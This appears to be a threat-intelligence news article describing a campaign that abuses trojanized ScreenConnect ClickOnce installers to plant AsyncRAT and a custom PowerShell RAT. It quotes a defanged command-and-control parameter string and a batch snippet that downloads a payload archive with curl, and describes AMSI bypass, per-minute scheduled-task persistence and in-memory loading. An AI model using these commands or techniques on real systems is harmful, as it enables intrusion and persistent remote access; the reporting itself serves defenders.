Threats Actors Weaponize ScreenConnect Installers to Gain Initial Access to Organizations

A sophisticated cyber campaign has emerged targeting U.S.-based organizations through trojanized ConnectWise ScreenConnect installers, marking a significant evolution in remote monitoring and management (RMM) tool abuse.

Since March 2025, these attacks have demonstrated increased frequency and technical sophistication, leveraging legitimate administrative software to establish persistent footholds within corporate networks.

The campaign employs deceptive social engineering tactics, distributing malicious installers disguised as official documents such as “agreement_support-pdf[.]Client[.]exe” and “Social_Security_Statement_Documents_386267[.]exe.”

These files appear to be legitimate support materials or financial documents, exploiting user trust to gain initial system access.

Once executed, the installers establish connections to attacker-controlled servers, effectively turning victims’ machines into remotely accessible assets.

What distinguishes this campaign from previous ScreenConnect abuse is the deployment of ClickOnce runner installers rather than traditional full installers.

Acronis researchers identified that these evolved installers lack embedded configuration data, instead fetching components and settings at runtime from compromised infrastructure.

This architectural change significantly complicates detection efforts, as traditional static analysis methods that rely on identifying suspicious embedded configurations become ineffective.

The threat actors demonstrate remarkable operational complexity by simultaneously deploying multiple remote access trojans (RATs) on compromised systems.

Within minutes of ScreenConnect installation, automated processes deploy both the well-documented AsyncRAT and a custom PowerShell-based RAT developed specifically for these campaigns.

This dual-deployment strategy suggests either redundancy planning or shared infrastructure among multiple threat groups.

Advanced Infection Chain Analysis

The technical sophistication of this campaign becomes apparent through examination of its multi-stage infection process.

The initial ClickOnce installer connects to attacker infrastructure using parameters such as “e = Support & y = Guest & h = morco[.]rovider[.]net & p = 8041,” establishing communication with command-and-control servers hosted on compromised virtual private servers.

Following successful installation, the malware leverages ScreenConnect’s built-in automation capabilities to execute a batch file designated as “BypaasaUpdate[.]bat.”

This initial payload functions as a sophisticated downloader, retrieving a compressed archive containing multiple encoded components:-

set LINK = https[:]//guilloton[.]fr/x[.]zip
set ZIP_PATH = %ProgramData% ali[.]zip
curl - s - o "%ZIP_PATH%" %LINK%

The downloaded archive contains strategically named files including “1[.]txt” (containing AsyncRAT), “pe[.]txt” (AMSI bypass mechanisms), and “Skype[.]ps1” (PowerShell execution script).

This naming convention represents deliberate obfuscation designed to evade signature-based detection systems.

The persistence mechanism demonstrates particular ingenuity, establishing scheduled tasks that execute every minute while implementing mutex checking to prevent duplicate instances.

The PowerShell script “Skype[.]ps1” loads encoded .NET assemblies directly into memory, bypassing traditional file-based detection methods while maintaining continuous system access for threat actors.

This campaign represents a concerning evolution in RMM tool weaponization, combining legitimate software abuse with sophisticated evasion techniques to establish persistent organizational access.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.